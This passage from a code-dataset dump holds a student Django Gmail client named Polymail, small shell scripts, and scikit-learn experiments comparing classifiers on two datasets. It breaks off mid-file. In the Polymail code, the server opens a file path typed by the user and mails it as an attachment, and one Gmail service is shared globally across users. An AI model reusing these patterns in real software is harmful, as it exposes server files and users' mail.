toString(){return \"VCFC-SSC-1YR-1B\";}},\n\tVCFC_SSC_1YR_10B{public String toString(){return \"VCFC-SSC-1YR-10B\";}},\n\tVCFC_SSC_3YR_1B{public String toString(){return \"VCFC-SSC-3YR-1B\";}},\n\tVCFC_SSC_3YR_10B{public String toString(){return \"VCFC-SSC-3YR-10B\";}},\n\tVCFC_SSC_3YR_10M{public String toString(){return \"VCFC-SSC-3YR-10M\";}},\n\tVCFC_SSC_3YR_100M{public String toString(){return \"VCFC-SSC-3YR-100M\";}},\n}\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 18.200000762939453,
"blob_id": "fdb7faf30fa9b41db0d12b12481942a3111996f4",
"content_id": "0049348d04eb5a59af54bfc3c799dd8216242ccd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nfor browser in \"safari\"\ndo\nmvn clean test -DvcfIp=10.9.10.110 -Dbrowser=$browser\ndone\n"
}
] | 13 |
Intro-to-SE-Lab-Fall-20/Group-4
|
https://github.com/Intro-to-SE-Lab-Fall-20/Group-4
|
1effe735f9a64fa1a0e5ddd47325d550d68d2675
|
bb2c3d29e2eb8dae5472a2b2b15e0184c9abe572
|
5e3e698999c9fda36a72a8140ce855adfbf01680
|
refs/heads/master
| 2023-01-10T03:37:44.105498 | 2020-11-10T22:12:18 | 2020-11-10T22:12:18 | 290,564,350 | 0 | 2 | null | 2020-08-26T17:40:40 | 2020-11-10T22:12:21 | 2020-11-11T07:15:48 |
Python
|
[
{
"alpha_fraction": 0.8533333539962769,
"alphanum_fraction": 0.8533333539962769,
"avg_line_length": 14,
"blob_id": "42c68e4c928de393664790c9027ee1d8c0c91b53",
"content_id": "9b3617af0cdca29117a042dab195571ea34a4b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "django\ndjango-allauth\ngoogle-api-python-client\ngoogle-auth\npython-dateutil\n"
},
{
"alpha_fraction": 0.5510203838348389,
"alphanum_fraction": 0.5513038635253906,
"avg_line_length": 33.92079162597656,
"blob_id": "5b2fa0565ca69160ee59be3b8e3b2d1bb85d5388",
"content_id": "a64706aaaaf431279b099922aafa4273643eaee9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3528,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 101,
"path": "/polymail/polymail/views.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nimport django.contrib.auth as auth\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect, render\n\nfrom .forms import EmailForm, SearchForm\nfrom . import models\n\ndef index(request):\n messages = None\n if request.user.is_authenticated:\n creds = models.UserProfile.get_google_credentials(request)\n service = models.create_service_if_necessary(creds)\n\n if service is None:\n raise ValueError('Could not create Gmail API')\n\n if request.method == 'GET':\n form = SearchForm()\n service = settings._GMAIL_SERVICE\n if (service is not None):\n messages = models.get_inbox(service, user_id='me')\n else:\n form = SearchForm(request.POST)\n if form.is_valid():\n search_query = form.cleaned_data['search_query']\n # TODO: search for relevant emails and display in index\n return redirect('/')\n return render(request, 'main/index.html', {\"form\":form, \"messages\": messages})\n\ndef compose(request, thread_id):\n if request.method == 'GET':\n if thread_id != '0':\n service = settings._GMAIL_SERVICE\n if (service is not None):\n message = models.get_specific_message(service, user_id='me', thread_id=thread_id)\n subject = message['Subject']\n sender = message['Sender']\n date = message['Date']\n to = message['To']\n body = (\"\\n\\n\\n--------Forwarded message--------\\nFrom: \" + sender \n + \"\\nDate: \" + date + \"\\nSubject: \" + subject + \"\\nTo: \" + to + \"\\n\\n\")\n body += message['PlainBody']\n initial_dict = {\n \"subject\":subject,\n \"body\":body\n }\n form = EmailForm(initial=initial_dict)\n else:\n initial_dict = {\n \"subject\":\"service failed\"\n }\n form = EmailForm(initial=initial_dict)\n else:\n initial_dict = {}\n form = EmailForm(initial=initial_dict)\n else:\n form = EmailForm(request.POST)\n\n if form.is_valid():\n to_email = form.cleaned_data['to_email']\n subject = form.cleaned_data['subject']\n cc = form.cleaned_data['cc']\n body = form.cleaned_data['body']\n attachment_path = form.cleaned_data['attachment']\n\n sender = 'me' # FIXME This needs to be the logged in user's email\n\n message = models.create_gmail_message(\n sender,\n to_email,\n cc,\n subject,\n body,\n attachment_path\n )\n\n service = settings._GMAIL_SERVICE\n if service is None:\n raise ValueError('service is None')\n\n sent = models.send_gmail_message(service, user_id='me', message=message)\n\n if not sent:\n raise Exception('Error occurred sending email')\n\n return redirect('/')\n\n return render(request, 'main/compose.html', {'form': form})\n\ndef emailview(request, thread_id):\n message = None\n service = settings._GMAIL_SERVICE\n if (service is not None):\n message = models.get_specific_message(service, user_id='me', thread_id=thread_id)\n\n return render(request, 'main/view-email.html', {\"message\": message})\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n"
},
{
"alpha_fraction": 0.6683291792869568,
"alphanum_fraction": 0.6683291792869568,
"avg_line_length": 29.846153259277344,
"blob_id": "632fe304ef7e3d54c8e3531ef52e26610ccc25c1",
"content_id": "d918df1aaaff5c4d83d182fd174774af322f818f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 13,
"path": "/polymail/polymail/urls.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django.urls import include, path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('logout/', views.logout),\n path('compose/<str:thread_id>/', views.compose, name=\"compose\"),\n path('emailview/<str:thread_id>/', views.emailview, name=\"emailview\"),\n path('admin/', admin.site.urls),\n path('accounts/', include('allauth.urls'))\n]\n"
},
{
"alpha_fraction": 0.588900625705719,
"alphanum_fraction": 0.5922183394432068,
"avg_line_length": 28.471111297607422,
"blob_id": "14c9019194ac9b3bc361b2ab1f851c35bccecb45",
"content_id": "0ef348266383514b2408f9119cdeac5e5d203b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6631,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 225,
"path": "/polymail/polymail/models.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\n\nfrom allauth.account.models import EmailAddress\nfrom allauth.socialaccount.models import SocialApp, SocialAccount\n\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\n\nimport mimetypes\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.audio import MIMEAudio\n\nimport os\n\nimport base64\nimport dateutil.parser as parser\n\n\ndef _on_delete(user):\n pass\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, related_name='profile', on_delete=_on_delete)\n\n def __unicode__(self):\n return ''\n\n class Meta:\n db_table = 'user_profile'\n app_label = 'main'\n\n def get_google_credentials(request):\n app = SocialApp.objects.get(provider='google')\n account = SocialAccount.objects.get(user=request.user)\n\n token = account.socialtoken_set.first().token\n refresh_token = account.socialtoken_set.first().token_secret\n\n client_key = app.client_id\n client_secret = app.secret\n\n scopes = settings.SOCIALACCOUNT_PROVIDERS['google']['SCOPE']\n\n creds = Credentials(\n token=token,\n refresh_token=refresh_token,\n client_id=client_key,\n client_secret=client_secret,\n scopes=scopes\n )\n\n return creds\n\n def account_verified(self):\n if self.user.is_authenticated:\n result = EmailAddress.objects.filter(email=self.user.email)\n\n if len(result):\n return result[0].verified\n\n return False\n\ndef create_service_if_necessary(creds):\n if settings._GMAIL_SERVICE is None:\n service = build('gmail', 'v1', credentials=creds)\n settings._GMAIL_SERVICE = service\n\n return settings._GMAIL_SERVICE\n\ndef create_gmail_message(sender, to, cc, subject, body, attachment_path):\n if attachment_path:\n message = _create_gmail_message_with_attachment(sender, to, cc, subject, body, attachment_path)\n else:\n message = MIMEText(body)\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n raw = base64.urlsafe_b64encode(message.as_bytes())\n raw = raw.decode()\n\n return {'raw': raw}\n\ndef _create_gmail_message_with_attachment(sender, to, cc, subject, body, attachment_path):\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n message.attach(MIMEText(body))\n\n content_type, encoding = mimetypes.guess_type(attachment_path)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n\n main, sub = content_type.split('/', 1)\n\n with open(attachment_path, mode='rb') as f:\n contents = f.read()\n\n if main == 'text':\n attach = MIMEText(contents, _subtype=sub)\n elif main == 'image':\n attach = MIMEImage(contents, _subtype=sub)\n elif main == 'audio':\n attach = MIMEAudio(contents, _subtype=sub)\n else:\n attach = MIMEBase(main, sub)\n attach.set_payload(contents)\n\n filename = os.path.basename(attachment_path)\n\n attach.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(attach)\n\n return message\n\ndef send_gmail_message(service, user_id, message):\n result = service.users().messages().send(userId=user_id, body=message).execute()\n\n return True\n\ndef get_inbox(service, user_id):\n results = service.users().threads().list(userId=user_id).execute()\n threads = results['threads']\n messages_list = []\n for thread in threads:\n temp_dict = {}\n msg_id = 
thread['id']\n temp_dict['id'] = str(msg_id)\n msg = service.users().messages().get(userId='me', id=msg_id).execute()\n payload = msg['payload']\n header = payload['headers']\n\n for one in header:\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n\n for two in header:\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n\n for three in header:\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n\n temp_dict['Snippet'] = msg['snippet']\n\n messages_list.append(temp_dict)\n\n return messages_list\n\ndef get_specific_message(service, user_id, thread_id):\n temp_dict = {}\n temp_dict['id'] = thread_id\n msg = service.users().messages().get(userId=user_id, id=thread_id, format=\"full\").execute()\n payload = msg['payload']\n header = payload['headers']\n for one in header:\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n for two in header:\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n for three in header:\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n for four in header:\n if four['name'] == 'To':\n msg_to = four['value']\n temp_dict['To'] = msg_to\n else:\n pass\n temp_dict['Snippet'] = msg['snippet']\n try:\n msg_parts = payload['parts']\n part_one = msg_parts[1]\n part_body = part_one['body']\n part_data = part_body['data']\n msg_body = base64.urlsafe_b64decode(part_data)\n msg_body = msg_body.decode('utf-8')\n temp_dict['Body'] = msg_body\n except: \n temp_dict['Body'] = msg['snippet']\n\n try:\n msg_parts = payload['parts']\n part_one = msg_parts[0]\n part_body = part_one['body']\n part_data = part_body['data']\n msg_body = base64.urlsafe_b64decode(part_data)\n msg_body = msg_body.decode('utf-8')\n temp_dict['PlainBody'] = msg_body\n except: \n temp_dict['PlainBody'] = msg['snippet']\n\n return temp_dict\n"
},
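create_gmail_message above returns a dict with a single 'raw' key because the Gmail API's users().messages().send() expects the full RFC 2822 message urlsafe-base64 encoded. A self-contained sketch of that encoding step and its round trip (the addresses are made-up placeholders):

import base64
from email.mime.text import MIMEText

message = MIMEText('hello')
message['to'] = 'recipient@example.com'
message['from'] = 'sender@example.com'
message['subject'] = 'test'

# Serialize to bytes, then urlsafe-base64 encode and decode to str,
# the shape the Gmail send endpoint accepts.
raw = base64.urlsafe_b64encode(message.as_bytes()).decode()
body = {'raw': raw}

# Decoding recovers the original RFC 2822 text, headers and body intact.
assert 'hello' in base64.urlsafe_b64decode(raw).decode()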
{
"alpha_fraction": 0.7164633870124817,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 22.428571701049805,
"blob_id": "a48e1e514065747032e275bbb67cfb182bb87799",
"content_id": "d0dacd81765b2e9e84c9f9882c1ab33e7950a8ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 14,
"path": "/launch.sh",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\n\nPYTHON_BINARY=${PYTHON:-python3}\n\n# Setup Python environment\nif [[ ! -d \"env\" ]]; then\n $PYTHON_BINARY -m venv env\nfi\n\nsource env/bin/activate\npip --disable-pip-version-check install -q -r requirements.txt\n\n# Launch the server; 'python' now points to $PYTHON_BINARY in the env\npython polymail/manage.py runserver\n"
},
{
"alpha_fraction": 0.8058914542198181,
"alphanum_fraction": 0.8074418902397156,
"avg_line_length": 106.5,
"blob_id": "99f66d8d3766863a73d61be3852de4a12a019043",
"content_id": "7b40f939f629370cc1550d9edb4ac6c2285f6d06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3225,
"license_type": "no_license",
"max_line_length": 712,
"num_lines": 30,
"path": "/README.md",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "# Group-4\nIntro to SE Lab Section 03 Group 4\n\n\n## Polymail\n### Description\nPolymail is a user-friendly web-based email client which seamlessly interfaces with multiple email service providers (gmail, yahoo, etc.). Polymail provides the user with the ability to quickly compose, edit, send, and forward emails to any email address. Emails can be formatted before sending by including italicized and bold text, as well as non-ASCII characters. Emails can also be supplemented with attachments of various media types including common document, audio, and video formats. Efficient searching through emails is also integrated through the use of user-provided keywords. Finally, Polymail is presented in an intuitive browser-based user interface to maximize user productivity and satisfaction.\n\n\n### Objective\nPolymail aims to be a reinvention of the popular email systems that are used by applications such as Gmail, Yahoo.com, and Outlook. Users at any experience level should be able to use Polymail, so our UI should be intuitive and easy to navigate around received and sent emails and different email functionalities, including composing, editing, sending, and forwarding emails as well as adding attachments. Polymail navigation will be aided by a search bar, which will assist users in quickly finding specific emails. \n\n\n### Features\n##### Email account authentication for Google users\nGoogle account holders will be able to sign in to Polymail securely by using the OAuth2 protocol. Persistent login during a user's session is required to prevent having to repeatedly login, and automatic sign out after a period of inactivity will also be available to avoid unauthorized users accessing Polymail on someone else's machine.\n\n##### Compose, edit, send, and forward email messages\nPolymail allows users to use basic email functionality including composing new messages, editing existing messages or drafts, and sending and forwarding emails to other email accounts including those outside of Polymail's supported email providers. Within these emails, Polymail will allow utilization of special characters beyond ASCII as well as bold and italicized text.\n\n##### Search for matching emails\nA search box will be available above the inbox where users can search for emails fitting the criteria that they fill into the field. The emails will be filtered by using a keyword search algorithm, and the resulting emails will be displayed in a list format for easy access and viewing.\n\n##### Email attachments\nWhile editing emails, an \"Add attachment\" option will be displayed in the window which will allow users to add an attachment from their local machine to the email. Various file types will be available for attachment including common text, image, audio, and video formats. This attachment will be bundled with the message and sent to the user alongside it. For emails with attachments, the send feature will wait for the attachments to finish uploading to send the email to avoid sending incomplete packages. This feature will be integrated with Windows and macOS file browsers for reliable image selection and attachment.\n\n### Contributors\nWil England - @wil-is-still-in-school\nIsaac Dyess - @isaacdyess\nDaniel Molsbarger - @Daniel-Molsbarger\n"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7080062627792358,
"avg_line_length": 48.07692337036133,
"blob_id": "621484613ef7684278ec94e0f9b721b47eaf1c60",
"content_id": "b0a5ef04dc5ba1f451f7a99f6b43e3dd7de2ff70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 13,
"path": "/polymail/polymail/forms.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django import forms\nimport datetime\n\nclass EmailForm(forms.Form):\n to_email = forms.EmailField(label=\"To\", required=True)\n subject = forms.CharField(label=\"Subject\", max_length=998, required=True)\n cc = forms.CharField(label=\"cc\", max_length=90, required=False)\n body = forms.CharField(label=\"Body\", widget=forms.Textarea)\n # attachment = forms.Field(label=\"attachment\", widget=forms.FileInput, required=False)\n attachment = forms.CharField(label=\"attachment\", max_length=1000, required=False)\n\nclass SearchForm(forms.Form):\n search_query = forms.CharField(label=\"Enter Search Term\")"
}
] | 7 |
kirbykasischke192/supervisedLearning
|
https://github.com/kirbykasischke192/supervisedLearning
|
212d8fe2920606262a8984b5bdda5a3e4758c27d
|
ec4c8e61c7cad07789f89486740e3e23f3e65605
|
40e7b00e92e187e4583e80a05114f59aea79e28d
|
refs/heads/master
| 2020-04-22T02:26:54.931396 | 2019-02-11T01:48:55 | 2019-02-11T01:48:55 | 170,049,313 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6592456698417664,
"alphanum_fraction": 0.7008905410766602,
"avg_line_length": 37.16999816894531,
"blob_id": "a02f0cf4fa0f524e35de2196c60635b160e59165",
"content_id": "96ea555daaf06a022b54eeef237ba2ee70117b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3818,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 100,
"path": "/src/neural_net.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/introduction-to-neural-networks-with-scikit-learn/\n\nimport pandas as pd\nfrom sklearn.neural_network import MLPClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n \nmax_depth_list = np.linspace(2, 50, 49, endpoint=True)\nlayer_size = [10,20,30,40,50,60,70,80,90,100]\nhidden_layers = [(10,10,10), (20,20,20), (30,30,30), (40,40,40), (50,50,50),\n (60,60,60), (70,70,70), (80,80,80),\n (90,90,90), (100,100,100)]\nfunctions = ['identity', 'logistic', 'tanh', 'relu']\nfor function in functions:\n sat_classifier = MLPClassifier(hidden_layer_sizes=(10,10,10), max_iter=1000, activation=function)\n pen_classifier = MLPClassifier(hidden_layer_sizes=(10,10,10), max_iter=1000, activation=function)\n #satT1 = time.time() \n sat_classifier.fit(X_train_sat, y_train_sat.ravel())\n #satT2 = time.time()\n #penT1 = time.time()\n pen_classifier.fit(X_train_pen, y_train_pen.ravel())\n #penT2 = time.time()\n y_pred_sat_test = sat_classifier.predict(X_test_sat)\n y_pred_pen_test = pen_classifier.predict(X_test_pen)\n\n pen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\n sat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\n# print(satT2-satT1)\n# print(penT2-penT1)\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n \nplt.figure(figsize=(12, 6)) \n#plt.plot(layer_size, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\nfor i in range(4):\n plt.bar(functions[i], pen_test_error[i])\nplt.title('Error Rate vs Activation Function') \nplt.xlabel('Activation Function') \nplt.ylabel('Error')\nplt.show()\nplt.figure(figsize=(12, 6))\n#plt.plot(layer_size, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\nfor i in range(4):\n plt.bar(functions[i], sat_test_error[i])\nplt.title('Error Rate vs Activation Function') \nplt.xlabel('Activation Function') \nplt.ylabel('Error')\nplt.show()\n\n# from sklearn.neural_network import MLPClassifier \n# sat_mlp = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000) \n# sat_mlp.fit(X_train_sat, y_train_sat.ravel())\n# pen_mlp = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000) \n# pen_mlp.fit(X_train_pen, y_train_pen.ravel())\n\n# y_pred_sat = sat_mlp.predict(X_test_sat)\n# y_pred_pen = pen_mlp.predict(X_test_pen)\n\n# from sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n# 
print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))\n# print(accuracy_score(y_test_pen, y_pred_pen))\n# print(accuracy_score(y_test_sat, y_pred_sat))\n\n"
},
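This script and its three siblings below share one preprocessing pattern worth isolating: the StandardScaler is fit on the training split only and then applied to both splits, so no test-set statistics leak into training. A runnable sketch on synthetic data (the shapes and class count are arbitrary):

import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split

X = np.random.rand(100, 5)
y = np.random.randint(0, 2, 100)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)

scaler = StandardScaler()
scaler.fit(X_train)                 # mean/variance from the training set only
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)   # the same statistics reused on the test set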
{
"alpha_fraction": 0.6954377293586731,
"alphanum_fraction": 0.7074599266052246,
"avg_line_length": 33.157894134521484,
"blob_id": "f63936559512f4c03b2a8a55b35f35353589bbf1",
"content_id": "e4267baafc047dccac133e10728e23bf3e8ce017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3244,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 95,
"path": "/src/svm.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/implementing-svm-and-kernel-svm-with-pythons-scikit-learn/\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nimport sklearn.metrics as metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n\nfunctions = ['linear', 'poly', 'rbf', 'sigmoid']\niterations = np.linspace(100, 1000, 10, endpoint=True)\n\nsat_classifier = SVC(kernel='rbf', gamma='auto') \npen_classifier = SVC(kernel='rbf', gamma='auto') \nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\ny_pred_sat_test = sat_classifier.predict(X_test_sat)\ny_pred_pen_test = pen_classifier.predict(X_test_pen)\n\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(iterations, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# for i in range(4):\n# plt.bar(functions[i], pen_test_error[i])\n# plt.title('Error Rate vs Max Iterations') \n# plt.xlabel('Max Iterations') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(iterations, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# for i in range(4):\n# plt.bar(functions[i], sat_test_error[i])\n# plt.title('Error Rate vs Max Iterations') \n# plt.xlabel('Max Iterations') \n# plt.ylabel('Error')\n# plt.show()\n\n \n# sat_svclassifier = SVC(kernel='linear', gamma='auto') \n# sat_svclassifier.fit(X_train_sat, y_train_sat) \n# pen_svclassifier = SVC(kernel='linear', gamma='auto') \n# pen_svclassifier.fit(X_train_pen, y_train_pen)\n\n# y_pred_sat = sat_svclassifier.predict(X_test_sat)\n# y_pred_pen = pen_svclassifier.predict(X_test_pen)\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))"
},
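The satT2-satT1 / penT2-penT1 pairs above are plain wall-clock timing of fit(); the same idiom isolated, on synthetic data (time.perf_counter would be the higher-resolution choice, but time.time matches these scripts):

import time
import numpy as np
from sklearn.svm import SVC

X = np.random.rand(50, 4)
y = np.random.randint(0, 2, 50)

t1 = time.time()
SVC(kernel='rbf', gamma='auto').fit(X, y)
t2 = time.time()
print(t2 - t1)  # training wall-clock time in seconds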
{
"alpha_fraction": 0.704983651638031,
"alphanum_fraction": 0.7177155613899231,
"avg_line_length": 32.53658676147461,
"blob_id": "46a62b587611dafaeef3772e717c6e4bcf8016ef",
"content_id": "28def91444e2ee9a137d5c18c16e76716486d3b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2749,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 82,
"path": "/src/knn.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/k-nearest-neighbors-algorithm-in-python-and-scikit-learn/\n\nimport pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\nimport sklearn.neighbors as neighbors\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nsat_accuracy = []\npen_accuracy = []\n\nleafsize = range(1, 61)\nalgorithms = ['ball_tree', 'kd_tree', 'brute']\n\nsat_classifier = KNeighborsClassifier(n_neighbors=6)\npen_classifier = KNeighborsClassifier(n_neighbors=1)\nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\ny_pred_sat = sat_classifier.predict(X_test_sat)\ny_pred_pen = pen_classifier.predict(X_test_pen)\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat))\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen))\n\npen_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_error = [1 - accuracy for accuracy in sat_accuracy]\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(leafsize, pen_error, color='red', linestyle='solid', 